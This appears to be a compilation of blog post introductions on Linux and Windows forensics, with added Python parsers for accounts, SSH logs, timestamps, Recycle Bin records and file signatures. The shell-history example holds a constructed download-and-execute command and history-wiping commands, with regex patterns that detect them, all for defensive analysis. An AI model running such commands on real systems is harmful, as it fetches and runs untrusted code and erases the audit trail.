Linux was designed as a multi-user operating system. To blend in with legitimate users, attackers may create their own user accounts, which give them backdoor access to the system whenever they want. When a Linux computer is suspected to be involved in an incident, one of the important activities to perform is to enumerate the users and groups on the system, so that any account that stands out as an anomaly can be identified. In this blog post, we will discuss some concepts surrounding user account enumeration on Linux systems.
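A worked example of the enumeration described above, added here and not part of the original post. It parses passwd(5)-style records and applies a few checks an analyst would run by hand: a second UID 0 account, UIDs shared between accounts, system-range UIDs that have an interactive shell, and interactive accounts whose home is outside /home. The sample content is constructed, with "backup2" and "svc_web" as the planted anomalies; the threshold of 1000 for regular-user UIDs is the usual default and is an assumption.

```python
"""Enumerate accounts from /etc/passwd-style data and flag anomalies."""
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample (not from a real system); backup2 and svc_web are planted.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backup2:x:0:0:backup:/root:/bin/bash
svc_web:x:1001:1001::/var/www:/bin/bash
bob:x:1002:1002:Bob:/home/bob:/usr/sbin/nologin
"""

INTERACTIVE_SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh",
                      "/usr/bin/bash", "/usr/bin/zsh", "/usr/bin/fish"}


@dataclass
class Account:
    name: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text):
    """Parse passwd(5) lines; malformed lines are skipped rather than trusted."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _pw, uid, gid, gecos, home, shell = fields
        accounts.append(Account(name, int(uid), int(gid), gecos, home, shell))
    return accounts


def find_anomalies(accounts, uid_min=1000):
    """Return (account name, reason) pairs worth an analyst's attention.

    uid_min is the first UID handed to regular users (1000 on most
    distributions; check /etc/login.defs on the system under examination).
    """
    findings = []
    names_by_uid = defaultdict(list)
    for a in accounts:
        names_by_uid[a.uid].append(a.name)
    for a in accounts:
        if a.uid == 0 and a.name != "root":
            findings.append((a.name, "UID 0 but not named root"))
        if len(names_by_uid[a.uid]) > 1:
            others = ", ".join(n for n in names_by_uid[a.uid] if n != a.name)
            findings.append((a.name, f"shares UID {a.uid} with {others}"))
        if a.shell in INTERACTIVE_SHELLS:
            if 0 < a.uid < uid_min:
                findings.append((a.name, "system-range UID with an interactive shell"))
            if a.name != "root" and not a.home.startswith("/home/"):
                findings.append((a.name, f"interactive shell with home outside /home ({a.home})"))
    return findings


if __name__ == "__main__":
    for name, reason in find_anomalies(parse_passwd(SAMPLE_PASSWD)):
        print(f"{name:10} {reason}")
```

On a real system, feed the contents of /etc/passwd from the forensic image (not the analysis workstation) to parse_passwd, and pair the result with /etc/shadow and /etc/group to see which flagged accounts have a usable password hash or sudo-capable group membership.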
Every Linux computer is connected to a network at some point. When a Linux computer is suspected to be involved in an incident, it is critical to collect network artifacts and interpret the recent networking activity that has taken place on the system. In this blog post, we will discuss some crucial network artifacts that can be collected from a Linux system.
You are a junior digital forensic analyst. You have heard that digital forensic professionals need to have the ability to write scripts quickly, to deal with the large amount of data in an investigation. You can write basic scripts, but you constantly wonder, ‘What kind of script will I be asked to write while helping out with an investigation?’. You want to be better prepared to write scripts in the field. This blog post presents four scenarios that require a digital forensic analyst to write scripts.
Yes, ‘systemd’ – you read that right. It’s not a typo. On most modern Linux distributions, systemd is the software suite that is responsible for bringing up critical system processes and system services. It plays a major role in booting up the operating system. One of the components of systemd is a journal that logs information about a lot of activity on the system. In this blog post, we will discuss some facts about the Linux systemd journal and how it plays an important role in Digital Forensics.
In the previous blog post we saw how a forensic image can be mounted on Linux. Typically, forensic investigations are time bound and forensic images carry a lot of data. We can use powerful Linux commands to quickly gather information about the files/directories on a forensic image. In this blog post, we will see how the find command can be used to process the contents of a forensic image.
In the previous blog post, we saw how a Linux computer can be used to acquire forensic images. Once an image has been acquired, how do we view and process the contents of the forensic image? It can be done using the various tools available and also using existing Linux commands. In this blog post, we will explore how the mount command can be used to view the contents of a forensic image.
Data is the major driving factor behind businesses worldwide. This data is stored in digital form by the organizations. Data is the most valuable asset of an organization as well as the prime target for attackers. This data is continuously being transferred over the internet which makes it possible for the attackers to compromise its security. The organization may suffer serious repercussions if the security of this data is compromised.
A forensic image is an exact replica of a hard disk or a hard disk partition made during a digital forensic investigation. There are various commercial and free tools available to acquire forensic images on Windows and Linux computers. Once you understand the basic concepts surrounding forensic images and practice how they can be acquired, you can be ready to help out during an investigation. In this blog post, we will discuss how Linux computers can be used to acquire a forensic image.
On your Windows computer, the hard disk that contains the operating system files and user files is typically mounted at C:. The term mount refers to a storage medium, such as a hard disk, USB drive or CD-ROM, being placed in a usable state so that a user can create and modify files on it. When a USB drive is attached, it is typically mounted at D: or E:. Likewise, on a Linux computer, apart from the hard disk that holds the system, external storage media connected to the computer are typically mounted under the /media directory (on desktop distributions) or /mnt. In this blog post, we will discuss the forensic importance of artifacts created by mounted devices on a Linux system.
When you visit a person’s home, you get to know about their interests, hobbies, everyday activities, etc. Likewise, within a user’s home directory (under /home) on a Linux system, you can find many forensic artifacts that are indicative of that user’s recent activity on the system. In this blog post, we will explore some of the crucial artifacts within a user’s home directory.
When using Linux systems in an environment, it is highly likely that you will remotely login to a machine over SSH. Using SSH is also a common technique for cyber adversaries to gain access or pivot into machines on the network. Every interaction via SSH leaves some artifacts on a system. In this blog post, we will discuss where SSH related artifacts are present on a Linux system and how they may be useful during an investigation.
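One of the SSH artifacts mentioned above is the authentication log (auth.log on Debian-style systems, secure on Red Hat-style systems, or the systemd journal). The following parser is an added example, not code from the original post: it extracts OpenSSH "Accepted"/"Failed" events, summarises them per source address, and flags sources that failed repeatedly and then got in, which is the pattern of a password-guessing attack that succeeded. The log lines are constructed for the example, including the key fingerprint.

```python
"""Summarise OpenSSH authentication events from syslog-style auth.log lines."""
import re
from collections import defaultdict

# Constructed sample lines (not from a real host) in OpenSSH's syslog format.
SAMPLE_AUTH_LOG = """\
Mar  3 10:01:12 web01 sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 51022 ssh2
Mar  3 10:01:15 web01 sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 51022 ssh2
Mar  3 10:01:19 web01 sshd[1204]: Failed password for root from 203.0.113.5 port 51030 ssh2
Mar  3 10:01:25 web01 sshd[1208]: Accepted password for root from 203.0.113.5 port 51040 ssh2
Mar  3 11:20:40 web01 sshd[1400]: Accepted publickey for alice from 198.51.100.7 port 40102 ssh2: RSA SHA256:c0nstructedF1ngerpr1nt
Mar  3 11:25:02 web01 sshd[1400]: Disconnected from user alice 198.51.100.7 port 40102
"""

AUTH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[(?P<pid>\d+)\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?P<invalid>invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)"
)


def parse_ssh_events(text):
    """Return one dict per authentication result; other sshd lines are ignored."""
    events = []
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if not m:
            continue  # disconnects, session open/close, etc. carry no auth result
        event = m.groupdict()
        event["invalid"] = event["invalid"] is not None  # user did not exist
        event["pid"] = int(event["pid"])
        event["port"] = int(event["port"])
        events.append(event)
    return events


def summarize_by_source(events):
    """Per source IP: failure count, accepted logins and guessed non-existent users."""
    summary = defaultdict(lambda: {"failed": 0, "accepted": [], "invalid_users": set()})
    for e in events:
        s = summary[e["ip"]]
        if e["result"] == "Failed":
            s["failed"] += 1
            if e["invalid"]:
                s["invalid_users"].add(e["user"])
        else:
            s["accepted"].append((e["user"], e["method"], e["ts"]))
    return dict(summary)


def suspicious_sources(summary, min_failures=3):
    """Sources that failed at least min_failures times and then logged in."""
    return sorted(ip for ip, s in summary.items()
                  if s["failed"] >= min_failures and s["accepted"])


if __name__ == "__main__":
    summary = summarize_by_source(parse_ssh_events(SAMPLE_AUTH_LOG))
    for ip in suspicious_sources(summary):
        print(ip, summary[ip])
```

The "Accepted publickey" line is worth a second look in practice as well: the fingerprint it carries can be matched against the keys in each user's ~/.ssh/authorized_keys to find out which key, and therefore possibly which machine, was used.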
An organization’s own personnel pose one of the biggest threats to its security. Human error or negligence tends to be the leading cause of data breaches in an organization. A threat that can be particularly severe for the organization, aside from those brought on by gross negligence, is that posed by a malicious insider. Compared to external threats like hackers, internal threats to the company can have much more catastrophic repercussions. The basics of insider threats, their types, their impact on the organization, and the tactics for detection and prevention are covered in this article.
Every file on a Linux computer has four timestamps associated with it: the last access time (atime), the last modification time (mtime), the last inode change time (ctime) and, on modern filesystems such as ext4, the creation time (btime). In this blog post, we will explore how those timestamps are maintained, some interesting facts surrounding them and their implications in DFIR.
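The fact about these timestamps that matters most in an investigation is which of them a user can set and which only the kernel sets. The experiment below, an added example that is not part of the original post, creates a temporary file and records how atime, mtime and ctime react to backdating with utime (what touch -d does), to a chmod, and to a content change. It assumes a Linux or other Unix host; on Windows, Python's st_ctime reports the creation time instead.

```python
"""Observe how Linux file timestamps react to utime, chmod and a write."""
import os
import tempfile

BACKDATE = 1577836800  # 2020-01-01T00:00:00Z, an arbitrary moment in the past


def timestamp_experiment():
    """Return named observations; every value should be True on Linux/Unix."""
    with tempfile.TemporaryDirectory() as workdir:
        path = os.path.join(workdir, "evidence.txt")
        with open(path, "w") as f:
            f.write("original content\n")

        # 1. Backdate atime and mtime, as 'touch -d' or an attacker's tool would.
        #    utime() sets those two, but the kernel sets ctime to *now*.
        os.utime(path, (BACKDATE, BACKDATE))
        after_utime = os.stat(path)

        # 2. Change permissions only: the inode changes (ctime), the data does not.
        os.chmod(path, 0o600)
        after_chmod = os.stat(path)

        # 3. Append content: both mtime and ctime move to the current time.
        with open(path, "a") as f:
            f.write("tampered\n")
        after_write = os.stat(path)

    return {
        "mtime_was_backdated": int(after_utime.st_mtime) == BACKDATE,
        "atime_was_backdated": int(after_utime.st_atime) == BACKDATE,
        "ctime_ignored_backdate": after_utime.st_ctime > BACKDATE,
        "chmod_kept_mtime": int(after_chmod.st_mtime) == BACKDATE,
        "chmod_touched_ctime": after_chmod.st_ctime_ns >= after_utime.st_ctime_ns,
        "write_moved_mtime": after_write.st_mtime > BACKDATE,
        "write_moved_ctime": after_write.st_ctime_ns >= after_chmod.st_ctime_ns,
    }


if __name__ == "__main__":
    for observation, holds in timestamp_experiment().items():
        print(f"{observation:25} {holds}")
```

The practical reading: an mtime that is older than the ctime of the same file is a sign that the modification time was set by hand, because a normal write moves both together. The creation time (btime) is not exposed by Python's os.stat on Linux; the stat command prints it as "Birth:" on kernels and filesystems that support it, and it is similarly not settable through utime.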
Every DFIR professional requires a forensic lab ready with various tools that can assist with handling incidents. Some software tools may need to be installed by the professional manually on their workstation. For example: tools that can process forensic images, hex file viewer/editor, log analysis tools, etc. There are some Linux distributions that come pre-installed with tools to assist in DFIR activities. This blog post gives a brief overview of some Linux distros for DFIR.
We use the Terminal application on Linux systems regularly to type powerful commands to interact with the system, alter the behaviour of the system, work with files/directories, etc. The Terminal uses Linux shells in the backend to receive commands from the user, interact with the system and display relevant results to the user. Linux systems are configured by default to store a history of the commands typed by the user, also referred to as shell history. In this blog post, we will see how shell history is useful in DFIR activities and how this capability can be best tuned for pre-incident preparation.
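An added example (not from the original post) of processing the artifact described above. Bash writes a "#<epoch>" line before each command only when HISTTIMEFORMAT was set in the shell that ran the commands, and by default it writes the file when the shell exits, so the parser handles both timestamped and plain histories. It also flags the commands most often used to tamper with history and a download-and-execute pattern. The history content is constructed for the example.

```python
"""Parse a bash history file, with or without HISTTIMEFORMAT timestamps, and
flag history tampering and download-and-execute commands."""
import re
from datetime import datetime, timezone

# Constructed sample ~/.bash_history (not from a real system).
SAMPLE_HISTORY = """\
#1709460012
ls -la /var/log
#1709460030
curl -s http://203.0.113.9/x.sh | bash
#1709460045
unset HISTFILE
#1709460051
history -c
"""

ANTI_FORENSIC = [
    re.compile(r"^\s*history\s+-c\b"),                 # wipe in-memory history
    re.compile(r"\bunset\s+HISTFILE\b"),               # stop writing the file
    re.compile(r"\bHIST(?:FILE)?SIZE=0\b"),            # truncate on exit
    re.compile(r"\brm\b.*\.(?:bash_|zsh_)?history\b"), # delete the file
    re.compile(r"\bln\s+-sf?\s+/dev/null\b.*history"), # redirect it to /dev/null
]
DOWNLOAD_AND_RUN = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba|z|da)?sh\b")
TIMESTAMP_LINE = re.compile(r"#(\d{9,10})")


def parse_history(text):
    """Return (timestamp or None, command) pairs in file order."""
    entries = []
    pending_ts = None
    for line in text.splitlines():
        m = TIMESTAMP_LINE.fullmatch(line)
        if m:
            pending_ts = datetime.fromtimestamp(int(m.group(1)), tz=timezone.utc)
            continue
        if not line.strip():
            continue
        entries.append((pending_ts, line))
        pending_ts = None
    return entries


def flag_suspicious(entries):
    """Return (timestamp, command, reason) for commands worth a closer look."""
    hits = []
    for ts, cmd in entries:
        if any(p.search(cmd) for p in ANTI_FORENSIC):
            hits.append((ts, cmd, "history tampering"))
        elif DOWNLOAD_AND_RUN.search(cmd):
            hits.append((ts, cmd, "download-and-execute"))
    return hits


if __name__ == "__main__":
    for ts, cmd, reason in flag_suspicious(parse_history(SAMPLE_HISTORY)):
        print(ts, reason, ":", cmd)
```

Because the file is written at exit, a session that is still open (or one killed with "kill -9") may have left nothing on disk; the commands of the live session are then only recoverable from memory. For pre-incident preparation, setting HISTTIMEFORMAT and making the history file append-only ("chattr +a") make this artifact considerably more useful.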
Every Linux system generates numerous logs by default, as it is being used. A DFIR professional is in a better position to handle an incident involving a Linux system, if they are aware of the various sources of logs, their locations and how the logs can be processed. This blog post highlights the various sources of logs in Linux systems.
As a Criminalist, which of the following actions would you take to preserve computer-based evidence?
The use of Linux systems is increasing every day – in personal computers, servers, IoT devices, etc. When cyber incidents occur, professionals capable of performing forensics on Linux systems are in great demand. It would be a great idea to include ‘Ability to perform Linux Forensics’ in your skill set. Are you wondering how to get started? This blog post will give you a brief introduction to performing Linux forensics.
When you pick a book to read, you would first read the title and a short summary about the book, before diving into the actual content. In the same way, in forensic investigations it is recommended to have an idea about the system you are working with before proceeding to collect evidence from it. This blog post highlights the information to be collected from a Linux system before proceeding with DFIR tasks during an investigation.
When you want a glass of water, you will head over to your kitchen to get it. You know the layout of your house, you know that the kitchen would have water – so you navigate there to get what you need. In the same way, to be able to perform Linux Forensics, it would be great to know about the layout of files on a Linux system and have an idea about where critical log files are stored. This blog post introduces you to the main directory structure on Linux systems. Knowing what information is held within the various directories will help a forensic examiner know where to look, while searching for evidence.
Have you watched movies where skilled cyber operators have black windows open on their computers, with coloured text scrolling through? They type some content in the black screens and magical stuff happens. Have you wondered how they go about doing all that? What applications may they be using? All those tasks can be performed on Windows, Linux-based and Mac operating systems. For now, let us focus on the Linux-based ones. This blog post introduces some basic concepts about Linux-based computers and discusses how Linux proves useful in the DFIR domain.
There is a command-line tool called ‘strings’ that extracts the printable text strings from any file. ‘strings’ is one of the most important tools every digital forensic professional must know about. This blog post discusses the working of the ‘strings’ utility and its significance in DFIR.
Windows Recycle Bin Forensics can be likened to dumpster diving. One of the best places to look for evidence is in the trash. When a user deletes a file through Explorer, it lands in the Recycle Bin, the trash area of Windows operating systems (files removed with Shift+Delete, from the command line, or from removable media bypass it). This blog post discusses how files exist within the Recycle Bin and how digital forensics can be performed on it.
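How a deleted file exists in the Recycle Bin, in code: since Windows Vista, each deleted file is stored under $Recycle.Bin\<user SID>\ as a pair, $R<random> holding the content and $I<random> holding the metadata. The parser below is an added example, not code from the original post. It handles the Vista/7/8 layout (version 1, with a fixed 520-byte name field) and the Windows 10 layout (version 2, with a length-prefixed name), and includes a builder so that the sample records are constructed in memory rather than taken from a real system. The version-2 name length is taken to include the terminating NUL.

```python
"""Build and parse Recycle Bin $I metadata records."""
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """FILETIME counts 100-nanosecond intervals since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def build_i_record(original_path, size, deleted_at, version=2):
    """Constructed test data: an $I record in the chosen layout version."""
    name = original_path.encode("utf-16-le")
    header = struct.pack("<QQQ", version, size, datetime_to_filetime(deleted_at))
    if version == 1:
        return header + name.ljust(520, b"\x00")        # fixed 260-char field
    if version == 2:
        # 4-byte character count (incl. NUL) followed by the UTF-16LE name
        return header + struct.pack("<I", len(original_path) + 1) + name + b"\x00\x00"
    raise ValueError(f"unsupported $I version {version}")


def parse_i_record(data):
    """Return the original path, size and deletion time stored in an $I file."""
    version, size, ft = struct.unpack_from("<QQQ", data, 0)
    if version == 1:
        raw_name = data[24:24 + 520]
    elif version == 2:
        (nchars,) = struct.unpack_from("<I", data, 24)
        raw_name = data[28:28 + nchars * 2]
    else:
        raise ValueError(f"unknown $I version {version}")
    return {
        "version": version,
        "original_path": raw_name.decode("utf-16-le").rstrip("\x00"),
        "original_size": size,
        "deleted_at": filetime_to_datetime(ft),
    }


# Constructed sample: a document deleted on 2024-03-03 at 10:01:25 UTC.
SAMPLE_DELETED_AT = datetime(2024, 3, 3, 10, 1, 25, tzinfo=timezone.utc)
SAMPLE_I_V2 = build_i_record(r"C:\Users\alice\Documents\payroll.xlsx", 48_213, SAMPLE_DELETED_AT)
SAMPLE_I_V1 = build_i_record(r"C:\Users\alice\Documents\payroll.xlsx", 48_213, SAMPLE_DELETED_AT, version=1)

if __name__ == "__main__":
    print(parse_i_record(SAMPLE_I_V2))
```

The $I record is what tells you where the file lived and when it was deleted; the $R file is the content and keeps its original MFT timestamps, so the two should be read together. Emptying the Recycle Bin deletes both, after which the usual deleted-file recovery techniques apply.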
Every DFIR professional must have the ability to perform memory forensics. This includes acquiring memory dumps, processing a memory dump for evidence and drawing conclusions for an investigation. Sometimes processing a memory dump is not a straightforward process. The investigator may have to perform some preliminary steps. This blog post discusses one of the preliminary steps which is sometimes performed before processing a memory dump for evidence.
Hashing is a digital fingerprinting technique used to ensure the integrity of data. When data is hashed, a mathematical algorithm produces a fixed-length value that corresponds to the data. This value, called a hash, can be used to verify that the data has not been modified: with a cryptographic hash function such as SHA-256, changing even one bit of the data produces a completely different hash, and it is computationally infeasible to find different data that produces the same hash. In this article, we explain the importance of hashing in digital forensics.
The best place to hide something is to hide it in plain sight – is a belief that crooks live by. Windows operating systems have a feature called Alternate Data Streams, abbreviated as ADS. The intention behind developing this feature was for technical advancements, but it has been misused to hide things in plain sight. This blog post gives you insight into Windows Alternate Data Streams – what is it, why was it introduced in the first place, how it has been misused and how it impacts DFIR.
Jane just purchased a new mobile phone. She enjoys describing it to her friends: the colour, form factor, storage capacity, RAM, etc. Everything that she is describing about the new phone is an attribute. The English dictionary describes an attribute as a feature of a product. Most Windows computers use the NT File System (NTFS) for file management. Every file has a name, timestamps, an owner, a size and its data. NTFS stores the various pieces of information relevant to a file as file attributes. This blog post introduces you to the most important NTFS file attributes and describes why they are important for digital forensics.
Every time you use your Windows computer, you are navigating through many files and folders. When you open a folder for viewing, you may also modify its viewing preferences. Windows stores this information in the registry (in the NTUSER.DAT and UsrClass.dat hives of each user) in structures known as Shellbags; think of them as a record of which folders a user has opened. This blog post will introduce you to Windows Shellbags and highlight their significance for digital forensics.
A friend tells you, ‘Hey I was downloading some animation software the other day and now my computer is acting up! I keep seeing these advertisements that my computer is infected by a virus and that I need to install a virus removal tool. What shall I do?’. You suspect that your friend may have inadvertently downloaded some malicious software. But where has this software come from? Since when has this abnormal activity been seen? This is when you put on your Web Browser Forensics hat and work your magic.
Digital Forensics relies on the power of timestamps and timelines. Windows operating systems that use NTFS or FAT file system for their storage media like hard disks, have a feature called File System Tunneling which influences how timestamps exist. This blog post discusses what file system tunneling is and its impact on digital forensics.
On Windows systems it is possible to schedule tasks to be completed at specific times or when specified triggers occur. This blog post discusses the significance of scheduled tasks in digital forensics.
One of the many log sources on Windows computers is the Event Log. This blog post discusses what Windows Event Logs are and their significance in digital forensics.
Are you wondering what Digital Forensics professionals do on a regular basis? This blog post will give you a brief idea about the activities typically performed by digital forensics professionals.
In a classroom, a teacher would have details of all the students who have enrolled in a particular course. Details about each student like student ID, name, enrolment date, etc. are stored in an organized way, probably within a table in a Word document or a spreadsheet. Likewise, details about every file on your Windows computer are stored in an organized way by the Master File Table. This blog post gives you a brief introduction to the Windows Master File Table and its significance in digital forensics.
The Windows operating system stores a lot of information about the activities performed by a user, ranging from which binaries were executed, to how applications were used, to even which files/directories were created, deleted or modified recently. This blog post discusses one log source, the $UsnJrnl file (the NTFS change journal), which records the changes made to files and directories on a volume.
Have you ever wondered how many files exist on your hard disk right now? Thousands. How does Windows operating system manage thousands of files efficiently? This blog post will give you a brief introduction to how Windows performs file management and its forensic significance.
‘Say cheese!’ You just took a photograph with all your friends. When you look at the photograph days or years later, you will remember the good memories you had when the picture was taken. Windows has a similar ‘photograph’ feature, called the Volume Shadow Copy Service, which captures the state of a volume at a point in time, so that earlier versions of files can be recovered even after they have been modified or deleted. This blog post will walk you through the importance of volume shadow copies for digital forensics.
Think about a big dictionary! It is like a database of words listed along with multiple meanings, synonyms and antonyms for each. Likewise, Windows systems store configuration information in a database commonly referred to as the Windows Registry. This blog post will give you a brief idea about the registry and how it may be useful during a forensic investigation.
Some people write down events of their daily lives in a journal. Looking through the pages of the journal, gives a glimpse into how the person has lived over the years. A journal holds the timeline of a person’s life. Similarly, every time you use your computer, some data about your activity is stored in specific locations. Looking through that data gives a glimpse into how you have used your computer over time. This blog post tells you about the importance of timelines in a forensic investigation.
When you wake up in the morning, you can recall events of the previous day. You also have memories of events that happened over the last few days. In the same way, a Windows computer also has numerous ways to recall how it had been used recently. One way is by using a hibernation file. This blog post discusses how the Windows hibernation file is useful in digital forensics.
You are a Junior Digital Forensics Investigator. Your manager has asked you to get familiar with performing forensics on memory dumps. This blog post will give you a brief overview about the potential information you can find in a memory dump.
Have you always dreamed of being a Digital Forensics and Incident Response Professional? You are new to the field, you have been applying for jobs, but companies are demanding some experience in the field. You have decided to learn some skills by setting up your very own DFIR lab at home. This blog post will help you get started!
Memory forensics is the process of analyzing a computer’s memory dump for evidence of a compromise. This process can be used to identify malicious software, track down system intrusions, and recover deleted data. Memory forensics is a critical tool for incident response and digital forensics investigations.
When an x-ray of the human body is taken, the complete skeletal structure of a person can be seen. This structure defines how the human body exists. Similarly, the files stored on your hard disk have a structure too. Many file formats begin with a fixed sequence of bytes referred to as the file magic number (or file signature), which identifies the format regardless of the file’s name or extension; some formats, such as plain text, have none. This blog post introduces you to the internal structure of files on disk and file magic numbers, and why you should know about them for digital forensics.
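The check an examiner actually runs with this knowledge is a signature-versus-extension comparison, which catches a renamed executable or an archive posing as an image. The code below is an added example, not from the original post; its signature table is a small subset of the well-known offset-0 magic numbers, and for "MZ" files it goes one step further and confirms the PE header that e_lfanew (offset 0x3C) points at. The sample files are constructed in memory.

```python
"""Identify a file's format from its leading bytes and compare with its extension."""
import struct

# (magic bytes at offset 0, description, extensions that normally carry it)
SIGNATURES = [
    (b"\x89PNG\r\n\x1a\n", "PNG image", {"png"}),
    (b"\xff\xd8\xff", "JPEG image", {"jpg", "jpeg"}),
    (b"GIF87a", "GIF image", {"gif"}),
    (b"GIF89a", "GIF image", {"gif"}),
    (b"%PDF-", "PDF document", {"pdf"}),
    (b"PK\x03\x04", "ZIP container (also docx/xlsx/pptx/jar/apk)",
     {"zip", "docx", "xlsx", "pptx", "jar", "apk"}),
    (b"\x7fELF", "ELF executable", {"", "so", "elf"}),
    (b"MZ", "PE/DOS executable", {"exe", "dll", "sys", "scr"}),
    (b"\x1f\x8b", "gzip data", {"gz", "tgz"}),
    (b"SQLite format 3\x00", "SQLite database", {"db", "sqlite", "sqlite3"}),
    (b"Rar!\x1a\x07", "RAR archive", {"rar"}),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "OLE2 compound document (doc/xls/msi)",
     {"doc", "xls", "ppt", "msi"}),
]


def identify(data):
    """Return (description, expected extensions) or (None, empty set)."""
    for magic, description, extensions in SIGNATURES:
        if data.startswith(magic):
            return description, extensions
    return None, set()


def is_pe(data):
    """For an 'MZ' file, confirm that e_lfanew (offset 0x3C) points at 'PE\\0\\0'."""
    if len(data) < 0x40 or not data.startswith(b"MZ"):
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def check_file(name, data):
    description, extensions = identify(data)
    extension = name.rsplit(".", 1)[1].lower() if "." in name else ""
    return {
        "name": name,
        "detected": description,
        "extension": extension,
        "extension_matches": None if description is None else extension in extensions,
        "pe_header": is_pe(data),
    }


# Constructed samples: a minimal MZ/PE stub renamed to look like a photo,
# a PDF header, and plain text (which has no magic number at all).
SAMPLE_PE = (b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", 0x40)
             + b"PE\x00\x00" + b"\x00" * 20)
SAMPLE_FILES = {
    "report.pdf": b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n",
    "holiday.jpg": SAMPLE_PE,
    "notes.txt": b"plain text has no magic number\n",
}

if __name__ == "__main__":
    for name, data in SAMPLE_FILES.items():
        print(check_file(name, data))
```

Only the first few bytes of each file need to be read, so this scales to a whole mounted image; the "file" command does the same job with a far larger signature database, and the two agree on every sample above.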
“If you did not document it, it did not happen” – is a doctrine followed diligently by digital forensic investigators worldwide. This blog post discusses the importance of documentation in a forensic investigation and provides best practices on how to write reports.
Alice and Bob are going on a hike. As they walk through the woods, they notice that they are leaving behind footprints of their trail. They hope that these footprints will help track their way back when they return from the hike. Did you know that, when Prefetch is enabled (the default on Windows client editions, though not on servers), every application executed on a Windows machine leaves behind footprints of its activity? This blog post introduces the concept of Windows Prefetch files, which act as one of the critical footprints about recent activity on a system.
Digital Forensics is the scientific process of uncovering the sequence of events that led to an incident. Timestamps clearly indicate the date and time when an event occurred on a system. This blog post discusses how timestamps are stored by three major operating systems: Windows, Linux-based and MacOS.
Have you wondered what the terms little-endian and big-endian mean? They refer to the order in which the bytes of a multi-byte value are stored in memory or on disk: little-endian stores the least significant byte first, big-endian the most significant byte first. This blog post will highlight the difference between little-endian and big-endian systems.
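The two posts above meet in practice: a timestamp pulled from a raw structure is a multi-byte integer whose epoch and unit depend on the operating system, and whose value depends on reading the bytes in the right order. The converter below is an added example, not code from the original posts. It covers the Windows FILETIME (100-nanosecond intervals since 1601-01-01), the Unix epoch used by Linux, the HFS+ epoch of 1904-01-01, the APFS nanoseconds-since-1970 format and the 2001-01-01 epoch used by macOS application data (CoreFoundation "absolute time"), and shows the same eight FILETIME bytes decoded both ways. The sample bytes are constructed (they encode 2020-01-01T00:00:00Z).

```python
"""Convert the raw timestamp formats of Windows, Linux and macOS to UTC datetimes,
and show why the byte order of the stored value matters."""
import struct
from datetime import datetime, timedelta, timezone

UTC = timezone.utc
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=UTC)        # Windows FILETIME
UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=UTC)            # Linux (seconds), APFS (nanoseconds)
HFSPLUS_EPOCH = datetime(1904, 1, 1, tzinfo=UTC)         # macOS HFS+
APPLE_ABSOLUTE_EPOCH = datetime(2001, 1, 1, tzinfo=UTC)  # CoreFoundation absolute time


def filetime_to_datetime(ft):
    """FILETIME: 100-ns intervals since 1601; Python datetimes stop at microseconds."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def unix_to_datetime(seconds):
    return UNIX_EPOCH + timedelta(seconds=seconds)


def apfs_to_datetime(nanoseconds):
    return UNIX_EPOCH + timedelta(microseconds=nanoseconds // 1000)


def hfsplus_to_datetime(seconds):
    return HFSPLUS_EPOCH + timedelta(seconds=seconds)


def apple_absolute_to_datetime(seconds):
    return APPLE_ABSOLUTE_EPOCH + timedelta(seconds=seconds)


def filetime_from_bytes(raw, byteorder="little"):
    """Decode 8 raw bytes as a FILETIME. Windows writes them little-endian;
    reading them big-endian yields a plausible-looking but wrong date."""
    (ft,) = struct.unpack("<Q" if byteorder == "little" else ">Q", raw)
    return filetime_to_datetime(ft)


# Constructed sample: 2020-01-01T00:00:00Z as a FILETIME. The integer is
# 132223104000000000 (0x01D5C03669050000); laid out little-endian the lowest
# byte comes first, which is how it appears in an MFT record or registry value.
SAMPLE_FILETIME_LE = bytes.fromhex("0000056936c0d501")
TARGET = datetime(2020, 1, 1, tzinfo=UTC)

if __name__ == "__main__":
    print("little-endian:", filetime_from_bytes(SAMPLE_FILETIME_LE))
    print("big-endian   :", filetime_from_bytes(SAMPLE_FILETIME_LE, "big"))
    print("unix         :", unix_to_datetime(1577836800))
    print("hfs+         :", hfsplus_to_datetime(3660681600))
    print("apfs         :", apfs_to_datetime(1577836800 * 10**9))
    print("apple abs    :", apple_absolute_to_datetime(599529600))
```

The three epochs are 11644473600 seconds (1601 to 1970), 2082844800 seconds (1904 to 1970) and 978307200 seconds (1970 to 2001) apart, which is why a timestamp interpreted with the wrong epoch lands decades away rather than failing outright; the wrong byte order, as the big-endian decode shows, lands in the year 1601. x86 and ARM systems, and therefore Windows, Linux and macOS on-disk structures, are little-endian, while network protocols and some older file formats are big-endian.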
A forensic image is an image created by a digital forensic examiner during the process of investigating a potential crime. This image is an exact replica of the original data, and can be used to identify and analyze digital evidence.
